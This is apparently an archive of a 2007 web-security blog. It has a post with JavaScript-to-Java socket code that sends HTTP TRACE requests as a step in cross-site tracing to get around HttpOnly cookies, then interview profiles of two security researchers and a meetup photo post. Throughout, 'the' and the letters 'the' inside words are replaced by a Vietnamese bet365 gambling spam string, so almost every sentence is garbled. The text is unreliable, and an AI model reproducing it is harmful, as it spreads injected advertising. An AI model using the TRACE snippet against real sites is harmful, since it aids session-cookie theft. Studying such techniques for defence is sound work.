Monday, April 30, 2007

Using Java from within browser's javascript to exploit web application vulnerabilities Part 1

Last weekend jeremiah showed me a code snippet where he was able to run TRACE method on a server using java from javascript. Though it was a little slow but it did cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 job. He asked me if cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re is a way to make it run faster. I did some work and using jdk1.4 API, I was able to get cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 job done a lot faster. I always knew that we can run java from javascript but it never crossed my mind that I can use it this way too. That is why, people like Jeremiah are so ahead in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 game, because cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y have cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ability to think differently.

In his post XST lives! (Bypassing HttpOnly) he has shown a proof of concept to exploit vulnerabilities in web applications.

The explanation here is (for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 most part) cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 same as on his blog posting except for maybe a couple of extra points. But this exercise actually got me thinking and I want to make this a running thread and come up with more ideas of using java and javascript to figure out what else can be done.


Approach 1 (Traditional Approach using earlier versions of jdk)

Complete Code

var l = document.location;
var host =l.host.toString();
var port = 80;
var addr = new java.net.InetAddress.getByName(host);
var socket = new java.net.Socket(addr,port);
var wr = new java.io.BufferedWriter(new java.io.OutputStreamWriter(socket.getOutputStream(),"UTF8"));
var rd = new java.io.BufferedReader(new java.io.InputStreamReader(socket.getInputStream()));
wr.write("TRACE / HTTP/1.1 \n");
wr.write("Host: " + host + "\n");
wr.write("\n\r");wr.flush();
var lines = "";
while ((str = rd.readLine()) != null)
{ lines += str + "\n"; }
alert(lines);
wr.close();
rd.close();
socket.close();

Step by Step explanation of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 code

1. Get cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 url on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 browser’s address bar

var l = document.location;

2. Get cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 host name.

var host =l.host.toString();

3. Set cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 port to 80. We can also determine cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 port from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 location bar

var port = 80;

4. Get cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 IP address of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 host given cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 host name. The host name can eicá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r be a machine name, such as "java.sun.com", or a textual representation of its IP address. If a literal IP address is supplied, only cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 validity of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 address format is checked.

var addr = new java.net.InetAddress.getByName(host);

5. Java.net.Socket creates a stream socket and connects it to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 specified port number at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 specified IP address.

var socket = new java.net.Socket(addr,port);

6. Open an output stream to send cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 request data to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 server.

var wr = new java.io.BufferedWriter(newjava.io.OutputStreamWriter(socket.getOutputStream(),"UTF8"));

7. Open an input stream to read cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 response data from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 server.

var rd = new java.io.BufferedReader(new java.io.InputStreamReader(socket.getInputStream()));

8. Send a trace request to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 server.

wr.write("TRACE / HTTP/1.1 \n");
wr.write("Host: " + host + "\n");
wr.write("\n\r");

9. Flush cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 output stream so that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re is no data left in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 buffer.

wr.flush();

10. Read cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 response from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 server until cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 readLine returns null which means cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 response is completed.

var lines = "";
while ((str = rd.readLine()) != null){ lines += str + "\n"; }

11. Display cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 lines using javascript alert function

alert(lines);

12. Close cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 input and output stream

wr.close();
rd.close();

13. Close cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 socket

Socket.close();


Approach 2

In cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 traditional way (like cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 approach mentioned above), you'd ask for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 socket's input and/or output streams. The newer approach is using Channels. This approach is available with jdk1.4 or newer. With a channel you write directly to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 channel itself. Racá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r than writing byte arrays, you read and write ByteBuffer objects. By default, this will read at least one byte or return -1 to indicate cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 end of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 data, exactly as an InputStream does but it will often read more bytes if more bytes are available to be read.

Complete Code
var l = document.location;
var host =l.host.toString();
var port = 80;
var addr = new java.net.InetAddress.getByName(host);

var client = java.nio.channels.SocketChannel.open(new java.net.InetSocketAddress(host, port));
var line = "TRACE / HTTP/1.1 \nHost: " + host + "\n\r\n";
var s1 = new java.lang.String(line);

client.write(java.nio.ByteBuffer.wrap(s1.getBytes()));

var buffer = java.nio.ByteBuffer.allocate(8000);
client.read(buffer);
alert(new java.lang.String(buffer.array()));



Step by step explanation


//Same as in above approach
var l = document.location;
var host =l.host.toString();
var port = 80;
var addr = new java.net.InetAddress.getByName(host);

1. Create a SocketChannel

var client = java.nio.channels.SocketChannel.open(new java.net.InetSocketAddress(host, port));

2. Create a java string object so that it can be converted to byte array.

var line = "TRACE / HTTP/1.1 \nHost: " + host + "\n\r\n";
var s1 = new java.lang.String(line);

3. Wrap cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 data into a ByteBuffer object. Send cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 buffer to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 server.

client.write(java.nio.ByteBuffer.wrap(s1.getBytes()));

4. Allocate a ByteBuffer object to read cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 data from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 server. The advantage of using ByteBuffer is that it will read more bytes at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 same time instead of reading one byte at a time.

var buffer = java.nio.ByteBuffer.allocate(8000);

5. Read cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 data from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 server. If cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 data is more cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 allocated bytes cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n use a while loop

client.read(buffer);

6. Display cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 response using javascript alert function

alert(new java.lang.String(buffer.array()));

If cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re is more data cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n allocated (like 8000 bytes here). Use cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 following code snippet

while (client.read(buffer) != -1) {

buffer.flip( );

out.write(buffer);

buffer.clear( );

}


The difference between cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 second approach is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first approach is slower cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 second approach. The first approach, however, will be more compatible across OSes since it uses earlier versions of jdk whereas cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 newer approach might not.

I will publish ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r things soon which I found out while doing this exercise.

Reflection on Andrew Van Der Stock


This week on reflection we have Andrew Van der Stock. Andrew is very active in webappsec industry through OWASP and is involved in a lot of activities including OWASP top ten or OWASP Guide, etc. He has contributed a lot to webappsec field, more so in terms of research and awareness on securing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 applications racá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n exploiting cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m. He used to be based out of Australia and has recently moved to Columbia, MD and joined Aspect Security. Today he shares with us his journey with web application security and his thoughts on black hat and white hat hackers (or should I say security professionals). In his own words


”I started playing with computers when I was 7 on a Commodore Pet. My first attempts of squeezing more out of my computer than it probably was capable of was with my Amstrad 6128, which ran a Z80 at 4 MHz. I more than doubled cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 speed of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 3" (yes, 3") disk drive by driving it directly. This is where I had my first taste of assembly language and low level prodding and probing.

Back in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 mid-1990, I was a system administrator at an Australian hospital. Doctors would frequently try to dump private electronic patient (UR) records for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir private use, possibly to sell to drug companies, but always illegal. This unregulated (at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 time) but
immoral use of our health data infuriated me and got me into ethics and privacy in a big way. This led me to join SAGE-AU, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 System Administrator's Guild of Australia, eventually rising to be SAGE-AU's President.

I used to be cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 editor of SAGE Advice, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 SAGE-AU journal, and I ended up writing about 20-30 articles for that. Most are system administration flavored, so not that useful to your readers.

I used to pen a weekly column for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Australian newspaper (a daily national broadsheet in Australia). I think I wrote about 30 odd articles for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m back in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 day, but cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir archives are closed to non-subscribers so I can't tell for sure. I lost a lot of data (we all
learn once!) when I went from my early Macs to my SMP workstation running Windows NT 3.51, and I still don't have all my data from that time. Luckily, I'm back on a beautiful Mac again, and as I've learnt cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 hard lessons of data, I have everything dating back to 1995.

I was cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 author of most of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 technical standards and policy set by auDA, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Australian Domain Name Administrator (similar in function to ICANN). I worked with two or three ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rs for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 majority of this project, although as always, we started with many more. My work on this panel regulates how DNS works in Australia.

I never completed my degree. If anyone from RMIT CS is reading, I wouldn't mind getting some credits for my work at OWASP so I can finish it up. Let's talk! If anyone else is interested in offering me a place in masters by research program in web app sec, I'd be interested. I don't think I'm really cut out for undergraduate course work, but I love doing ground breaking research.

I am a dual Microsoft MCSE. My first MCSE was NT 4.0 back in 1997, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n I got my Windows 2000 early adopter MCSE in late 1999 when cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y were trialing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 exams. Early adopters got a nice Gold MCSE card! Many folks find this a bit funny, especially as I've been active in open source for so long... And that I'm really a Mac dude at heart.
But I have a soft spot for Microsoft as cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y do cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 basic research in our field, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y own up to security flaws and fix cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m properly. Now, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y're reaping cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 rewards. Good for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m. Many vendors could learn a thing or ten from MS. I'm pretty sure my MCSE's are expired now.

In 1998, I entered cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 field properly as a security consultant. At that stage, finance institutions were starting to review cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 lockdown of apps. I was drafted into looking at various apps for many larger finance institutions, who were concerned with unmanaged risk and "mobile code" - ActiveX and Java applets running on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir PCs. My interest grew from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re, even though I didn't really start code reviewing stuff every day until cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 early part of this century.

In web app sec, I am completely self taught, but I did learn a lot from folks at OWASP – no one lives in a vacuum. I still do a lot of research using forum software to see how things can be fixed in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 real world. I love working with some very smart folks who challenge me every day. It's a sad day when you don't learn or discover something new.

To understand this field, you must understand cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 threats and attacks to defend against cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m. I am reasonably certain anyone can learn how to attack if cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y Think Evil for long enough. It's far easier to Think Evil and destroy than it is to create solid software.

The proof of this putrid state of affairs is s'kid marks getting lots of unthinking column centimeters every day, and yet how little praise cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 folks in Microsoft got for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir work on .NET 2.0. .NET 2.0 advances cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 field in so many ways – say by automatically rejecting any option in a select list which wasn't sent out in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first place. Whoever thought of that should be on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 front page of CNET for a year to make up for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 waste of space most "hacking" stories get. And cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re are so many more unsung heroes - master craftsmen (and women!) all. For every La Padula or Bell or Schneier, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re's a thousand or more s'kid marks. This is a very asymmetrical situation and it's not good for our industry.

Criminals who attack systems are simply criminals, or in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 abstract, attackers. Low level attackers are "s'kid marks" to me – morons who have a script who think cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y are cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 most l33t players. Unfortunately, a million s'kid marks equates to a lot of damage as eventually one or two will strike it lucky during school break.

The true hackers are folks like polymaths like Turing, von Neumann, Douglas Engelbart (cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 primary creator of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 desktop metaphor back in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 1960s), Steve Wozniak (a true hardware hacker), cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 folks who made my HP 48G calculator (a work of art and macá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365matical tour de force!), and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 recently deceased John Backus (cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 guy who created Fortran and is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 "Backus" in BNF, used in every RFC grammar from here to
eternity). Those folks are worthy of respect and are cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 true meaning of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 word "hacker". But now, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 word is lost forever because of constant misuse over a long period of time.

My thing is software engineering as a repeatable practice. We have to stop treating web app sec as a black art. We have to stop lauding cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 attackers and praising cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 folks who deliberately break software for nothing more than getting cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir name in lights. We have to stop thinking cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se folks are somewhat special. If you're a s'kid mark today, it's time to step up and move on. If you're any good, come join us on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 light side of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 force – before you commit a crime. There's so much to do and so much research begging for someone to just come and do it.

We should be celebrating cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 folks who put cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 hard yards into security research which protects us all – permanently. I'm trying to do this with CSRF at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 moment, and will be taking some time this year to make PHP 6.0 safer. I know how to attack software and have done so, but I prefer to build strong software, so my skills lie in ensuring that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 defenses and controls I write about, recommend, or indeed implement are robust against known attacks as well as cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 stuff over cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 horizon. Occasionally, I am at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 horizon, such as when I went and played with JSON injection before pretty much anyone else. I don't claim to have invented JSON injection as it's so totally obvious anyone with half a clue could have recreated my work without any knowledge of what I was doing.

We need more folks who hang out at OWASP and WASC. We should have totally eliminated all forms of injection and ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r common weaknesses by now - and moved on to where cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 value lies – cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 business rules. It's a shame so many are sucked in by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 dark side of our industry. It's such a waste of good talent.

I'm one of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 dudes working on questions for SANS "National Secure Programming Skills Assessment", a soon to be forthcoming certification which will sort cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 wheat from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 chaff. I'm doing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Java questions (eventually) and hope to be involved in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 PHP questions when cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y kick that off. With some luck, this will not become a paper certification (where certified but clueless folks are rampant), but a suitable metric to prove skill.

I had a book contract to write an Ajax Security Book based upon my world famous Ajax Security Presentation from February last year. However, life intervened, and that's on permanent hold, especially as Billy Hoffman & co is writing what will be a superb Ajax Security book if his research is anything to go by.

I have cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 bones of a security architecture book waiting to go. If anyone feels like writing it with me, I should be free enough sometime in about two-five years :) Really should finish Guide 3.0 before starting this one though.

I've been involved in open source a long time. My first open source project, which I never completed (shame!) was GNU stty (gstty). Since cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n, I've been involved in XFree86 (from about 1996 onwards), Linux kernel when things didn't work on my SMP workstation (SMP was rare in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 day), on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 extreme periphery of NetBSD (my friend Luke was NetBSD core, so I wanted to show a little loyalty to his projects ;), pnm2ppa – print drivers for HP's worst ever printers for Unix/Linux/BSD.

Since 2001, I've been running Aussieveedubbers, a largish VW nut forum. Through that, I got into writing forums. Initially, I helped write XMB, which after a spat became UltimaBB, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n GaiaBB, and possibly that code base will be re-forked back into XMB. UltimaBB is very secure compared to its contemporaries as I've been busy with it. However, like all projects using my infinite spare time... Things take a back seat to my real job and my real life.”

Below are his contributions to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 webappsec community.

Articles:-

OWASP Guide 2.0 – as lead author and editor.
http://www.owasp.org/index.php/Guide_Table_of_Contents

OWASP Top 10 2007 (along with Dave Wichers and Jeff Williams).
http://www.owasp.org/index.php/Top_10_2007

Many web app sec blog articles:

http://www.greebo.net/?cat=3 (web app sec, 47 blog entries)
http://www.greebo.net/?cat=16 (OWASP, 24 blog entries)
http://www.greebo.net/?cat=17 (conferences and travel)


Memberships:-

Executive Director - OWASP
Columbia PHP user group
SAGE-AU 1995 - 2002, ex-President Jun 2000 – Mar 2001
AISA


Conferences:-

Andrew has presented at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 following conferences:

SAGE-AU - The System Administrators Guild of Australia
OWASP – Open Web Application Security ProjectLinux Australia
AusCERT – Australian Computer Emergency Response Team
RuxCon - Australian security conference, Vulnerability assessment and hacking information, for Australia
Black Hat – Black Hat
OSCON – Oreilly Open Source Convention


His favorite presentation is Ajax Security presentation. http://www.greebo.net/owasp/ajax_security.pdf

Predictable ISN numbers in Foundry ServerIron. My first bugtraq advisory back in 2000. So proud!
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0178


Tutored "Internet 101" back in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 early 1990's at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Business Faculty at RMIT University


Tools written by him:-

WebSphere {xor} Secret Magic Ring Decoder Toy (C#)

XMB / UltimaBB / GaiaBB – forum software. It's a good test harness for new webappsec ideas. XMB 1.9.7 is due soon which fixes a lot of security issues. (PHP)


Companies worked for:-

Web Application Security jobs:

e-Secure – Senior Security Architect
b-sec – Chief Technologist
National Australia Bank – Security Application Architect
Aspect Security – Senior Engineer


Company working for:-

Aspect Security


Email:-

vanderaj__at__owasp__dot__org



Website:-

http://www.owasp.org


He has one of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 sharpest brains in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 industry. These contributions above do not reflect cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 amount of work he has done in promoting awareness in web application security.

Last Week – Nish Bhalla
Next Week – Bill Pennington

Monday, April 23, 2007

WASC Meetup - April 18 - pictures

Sorry for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 delay in this post. Last wednesday we had our WASC meetup in sunnyvale. Unfortunately cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 date coincided with OWASP san francisco chapter meeting and some infosec conference in toronto so we did not get as much attendance we expected but still some of us showed up. Jeremiah had already mentioned on his blog that everyone has to buy a beer for someone cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y havent met before. :)


Before you look at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 pictures, i want to apologize for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 quality since cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y were taken from my cellphone.



From left to right -
Comcor - looking at people he hasnt met before, thinking how much beer he will have to buy.
Jeremiah (whitehat) - thinking why am i so popular. everyone knows me so nobody will buy me a beer. Grrr
Brian Chess (Fortify Software) - laughing since cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re are a lot of people who will have to buy him a beer. He has no clue that he have to buy for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m as well.


From left to right
Joe (Tivo) - All smiles since he got his beer.
Robert Auger (WASC) - asking cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 guy to buy drinks since he has never met him before.
??? - He didn't tell me his name. maybe he didnt want to buy me a drink.


Left - comcor wondering do i really need to buy ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rs a drink.
Right - Jeremiah (whitehat) smiling and enjoying his beer. Maybe he has a plan for someone to pay for it.




From left to right -

Cori (Google) - Looking at brian chess (right) to buy him a beer
Jeremiah (Whitehat) - Ordering appetizers for us (it was very nice of him)
Brian Chess (Fortify Software) - probably scared..he doesn't want to buy Cori a beer

Left - Frederick Lee (Fortify Software) wondering what did i do to deserve this.
Right - Joe (Tivo) - probably thinking how to get jeremiah to pay for everybody's beer. You can see a smile on his face




From left to right -
Andy (Paypal), Robert Auger (WASC), Joe (Tivo)
Everybody happy since Jeremiah picked cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 tab.


All cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 jokes apart, it was fun getting to know people who are in bay area and hopefully we will do it again sometime in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 next couple of months. This time we will make sure that it doesnt coincides with ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r events.

Special thanks to Jeremiah for bringing all of us togecá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r.

Reflection on Nish Bhalla


This week on reflection we have Nish Bhalla from SecurityCompass. Nish has been around cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 block for a long time and used to work for FoundStone before starting his own company. He is a specialist in product testing, code reviews, web application testing, host and network reviews. He has presented in various conferences, published articles, contributed and co-authored several books. He takes lectures and Webinars at Seneca College , Florida University and has also been quoted in Government Security News, InternetNews and CSO Online.
He has tremendous knowledge in webappsec space and has been involved with OWASP and YASSP. Below is his journey in WebAppSec space in his own words

“I've been interested in security since cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 mid 90s' pretty much right after I was exposed to UNIX. I started off by developing client / server apps around cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 same time and tried to hack cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m. Security knowledge was still considered underground hacker knowledge cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n and not a whole lot of information was publicly disseminated. I had cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 opportunity to meet with a few interesting virus writers back at school who taught me a few things about reverse engineering and Clipper cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 old reversing software (not cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 clipper programming language).

I started learning about web technologies in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 late 90s when I was involved in performing host audits and building secure web servers. I had cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 opportunity to be involved with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 rollout of an online trading company's web application. This was cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 time where I started getting a good understanding of web applications and how cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y interact with various components. I took care to understand cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 technologies and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir underlying protocols during this time.

During cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 same time (in late 90's) I had cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 opportunity to work for Foundstone. An amazing team of security consultants taught me some new tricks on hacking web applications. I had already learnt a lot about web security when I was involved with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 rollout but what cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se consultants taught me was to adopt a different mind set - cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 attacker's mind set.

The ease of exploiting of Web Applications was what got me so involved in web app sec (unlike writing buffer overflows which requires a lot more low level knowledge and skills). The code behind cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 various web application vulnerabilities caught my interest more than just cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 vulnerabilities cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365mselves.

